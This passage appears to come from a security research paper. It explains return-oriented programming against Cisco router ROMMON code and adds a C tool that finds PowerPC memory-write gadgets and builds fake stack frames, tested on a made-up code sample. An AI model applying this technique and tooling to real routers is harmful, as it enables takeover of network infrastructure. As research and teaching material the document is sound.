To overcome the high uncertainty in the memory layout, a memory section is required that allows its contents to be executed as code and, preferably, already contains code at a stable location.
Cisco routers use a piece of code called ROMMON as the first code executed after the CPU has been reset. ROMMON is mapped into memory at the initial reset vector and serves as the bootstrap code for IOS. ROMMON also contains functionality for disaster recovery (loading a new image when the available one is broken or corrupted) as well as some basic setup functions.
On the Cisco platforms reviewed by the author, ROMMON is placed in the uppermost memory regions after the CPU's virtual addressing and address translation have been initialized to match the IOS image's memory map. Its location is therefore known and invariant.
The decisive factor for using ROMMON as the return target is the relatively small number of versions published for each router platform. Taking the 2600 access router platform as an example, there are 8 different versions of ROMMON known to the author. With a few exceptions, due to hardware support added in later ROMMON versions, deployed infrastructure equipment rarely receives ROMMON upgrades. Therefore, the large majority of routers run the ROMMON version that was current when the equipment was manufactured. Since such equipment is usually ordered in bulk when new infrastructure is installed, the versions will neither differ within a deployment nor will later versions be very common, because the initial version is the one sold the most.
Applying return-oriented programming to the code found in ROMMON, it has been shown [7] that arbitrary 32-bit memory writes into the memory area that contains the exception handlers can be used on PowerPC- and MIPS-based Cisco routers to gain reliable code execution from stack-based buffer overflows.
The method returns into function epilogues that perform a memory write through a register the attacker already controls, storing the contents of another register that is also under the attacker's control. On PowerPC, these are usually registers that, according to the PowerPC ABI, must be preserved across function calls (i.e. R13 to R31); because epilogues restore exactly these registers from the stack frame, the attacker can set them through the overflowed stack before each return.
Also beneficial for the attacker is the fact that ROMMON contains code to disable the CPU's instruction and data caches, which allows data to be written and then executed as code immediately afterwards without cache coherency issues.
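The gadget hunt described above, as an added example that is not from the original paper: a small C tool that scans a big-endian PowerPC code blob for `stw rS,d(rA)` instructions whose operands are both callee-saved registers and that fall through, without any intervening branch, into a function epilogue (reload LR from the stack, restore r13..r31 with `lmw`, `blr`), then plans the register values and the fake stack frame for one 32-bit write. The byte blob, the target address 0x80000100, the value 0x4E800020 and the return address 0xFFF00004 are constructed for this example; they are not ROMMON code or real addresses.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* A "write-what-where" gadget: stw rS,d(rA) on two callee-saved registers that
 * falls through, with no branch in between, into an epilogue that reloads LR
 * from the stack (lwz r0,N(r1); mtlr r0), restores r13..r31 (lmw) and blr's. */
struct write_gadget {
    uint32_t offset;     /* offset of the stw inside the scanned code */
    int rs, ra;          /* value register / address register */
    int16_t disp;        /* the store writes rS to [rA + disp] */
    uint32_t lr_slot;    /* r1-relative slot the epilogue reloads LR from */
    uint32_t frame_size; /* bytes the epilogue adds to r1 */
    int lmw_first;       /* first register restored by lmw rX,N(r1); -1 if none */
    uint32_t lmw_slot;   /* r1-relative slot that lmw starts reading at */
};

static uint32_t be32(const uint8_t *p) { return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3]; }
static void put_be32(uint8_t *p, uint32_t v) { p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16); p[2] = (uint8_t)(v >> 8); p[3] = (uint8_t)v; }

/* PowerPC D-form fields and the few opcodes the scanner needs to recognise. */
#define OPCD(w) ((w) >> 26)
#define RS(w)   ((int)(((w) >> 21) & 31))
#define RA(w)   ((int)(((w) >> 16) & 31))
#define DISP(w) ((int16_t)((w) & 0xffff))
#define XO(w)   (((w) >> 1) & 0x3ff)
#define CALLEE_SAVED(r) ((r) >= 13 && (r) <= 31)   /* r13..r31 in the PowerPC SVR4/EABI */
static int is_blr(uint32_t w)    { return w == 0x4E800020u; }
static int is_mtlr(uint32_t w)   { return (w & 0xFC1FFFFFu) == 0x7C0803A6u; }
static int is_branch(uint32_t w) { return OPCD(w) == 16 || OPCD(w) == 18 || (OPCD(w) == 19 && (XO(w) == 16 || XO(w) == 528)); }

/* Scan big-endian PowerPC code for write gadgets; window = max instructions
 * between the stw and the blr. Returns how many gadgets were stored in out[]. */
int find_write_gadgets(const uint8_t *code, size_t len, int window, struct write_gadget *out, int max_out) {
    int n = 0;
    for (size_t off = 0; off + 4 <= len && n < max_out; off += 4) {
        uint32_t w = be32(code + off);
        if (OPCD(w) != 36 || !CALLEE_SAVED(RS(w)) || !CALLEE_SAVED(RA(w))) continue;  /* want stw rS,d(rA), both nonvolatile */
        struct write_gadget g = { (uint32_t)off, RS(w), RA(w), DISP(w), 0, 0, -1, 0 };
        int saw_mtlr = 0, ok = 0;
        for (int i = 1; i <= window && off + 4 * (size_t)(i + 1) <= len; i++) {
            uint32_t x = be32(code + off + 4 * i);
            if (is_blr(x))    { ok = saw_mtlr; break; }  /* only useful if LR came from our frame */
            if (is_branch(x)) break;                     /* control leaves the epilogue: reject */
            if (is_mtlr(x)) saw_mtlr = 1;
            else if (OPCD(x) == 32 && RS(x) == 0 && RA(x) == 1) g.lr_slot = (uint16_t)DISP(x);   /* lwz r0,N(r1) */
            else if (OPCD(x) == 46 && RA(x) == 1) { g.lmw_first = RS(x); g.lmw_slot = (uint16_t)DISP(x); }  /* lmw rX,N(r1) */
            else if (OPCD(x) == 14 && RS(x) == 1 && RA(x) == 1) g.frame_size = (uint16_t)DISP(x);  /* addi r1,r1,N */
        }
        if (ok) out[n++] = g;
    }
    return n;
}

/* Pick register values so that gadget g performs *(uint32_t *)target = value. */
void plan_write(const struct write_gadget *g, uint32_t target, uint32_t value, uint32_t regs[32]) {
    regs[g->ra] = target - (uint32_t)(int32_t)g->disp;  /* cancel the displacement, mod 2^32 */
    regs[g->rs] = value;
}

/* Lay out the fake frame g's epilogue consumes: the r13..r31 image reloaded by
 * lmw (these become the operands of the *next* gadget's stw) and the saved-LR
 * slot blr returns through. Returns bytes of frame needed, 0 if cap is too small. */
size_t build_frame(const struct write_gadget *g, const uint32_t regs[32], uint32_t next_lr, uint8_t *frame, size_t cap) {
    size_t need = g->lr_slot + 4;
    if (g->lmw_first >= 0 && g->lmw_slot + 4 * (32 - g->lmw_first) > need) need = g->lmw_slot + 4 * (32 - g->lmw_first);
    if (need > cap) return 0;
    memset(frame, 0, need);
    if (g->lmw_first >= 0)
        for (int r = g->lmw_first; r < 32; r++) put_be32(frame + g->lmw_slot + 4 * (r - g->lmw_first), regs[r]);
    put_be32(frame + g->lr_slot, next_lr);
    return need;
}

/* Constructed stand-in for a ROMMON fragment (made up for this example, not dumped from a device). */
static const uint8_t sample_rommon[] = {
    0x90,0x03,0x00,0x00,  /* 00: stw  r0,0(r3)      volatile operands: rejected */
    0x93,0xDD,0x00,0x00,  /* 04: stw  r30,0(r29)    candidate */
    0x80,0x01,0x00,0x64,  /* 08: lwz  r0,0x64(r1)   epilogue reloads saved LR */
    0x7C,0x08,0x03,0xA6,  /* 0c: mtlr r0 */
    0xB9,0xA1,0x00,0x14,  /* 10: lmw  r13,0x14(r1)  restore r13..r31 from the frame */
    0x38,0x21,0x00,0x60,  /* 14: addi r1,r1,0x60    pop the frame */
    0x4E,0x80,0x00,0x20,  /* 18: blr */
    0x93,0xFE,0x00,0x04,  /* 1c: stw  r31,4(r30)    candidate... */
    0x48,0x00,0x00,0x08,  /* 20: b    +8            ...rejected: a branch precedes the blr */
    0x4E,0x80,0x00,0x20,  /* 24: blr */
};

/* Full flow on the sample: find the gadget, plan one write of 0x4E800020 to 0x80000100
 * and a return to 0xFFF00004 (all three values hypothetical). Returns the frame length. */
static size_t run_sample(struct write_gadget *g, uint8_t *frame, size_t cap) {
    struct write_gadget found[8]; uint32_t regs[32] = {0};
    if (find_write_gadgets(sample_rommon, sizeof sample_rommon, 8, found, 8) == 0) return 0;
    *g = found[0];
    plan_write(g, 0x80000100u, 0x4E800020u, regs);
    return build_frame(g, regs, 0xFFF00004u, frame, cap);
}
int sample_gadget_count(void) { struct write_gadget f[8]; return find_write_gadgets(sample_rommon, sizeof sample_rommon, 8, f, 8); }
struct write_gadget sample_gadget(void) { struct write_gadget g = {0}; uint8_t f[256]; run_sample(&g, f, sizeof f); return g; }
size_t sample_frame_len(void) { struct write_gadget g; uint8_t f[256]; return run_sample(&g, f, sizeof f); }
uint32_t sample_frame_word(size_t off) { struct write_gadget g; uint8_t f[256]; size_t n = run_sample(&g, f, sizeof f); return off + 4 <= n ? be32(f + off) : 0; }
```

On the sample, only the `stw r30,0(r29)` at offset 4 qualifies: the first store uses volatile registers, and the third is followed by a `b` before its `blr`, so control would leave the epilogue. The planned frame places `0x80000100` in the r29 slot (r1+0x54), the value in the r30 slot (r1+0x58) and the next return address at r1+0x64, i.e. the attacker must control 0x68 bytes above r1 when the epilogue runs. Chaining several writes means each frame carries the registers for the following gadget, which is why `build_frame` takes the full register image rather than only the two registers of the current store.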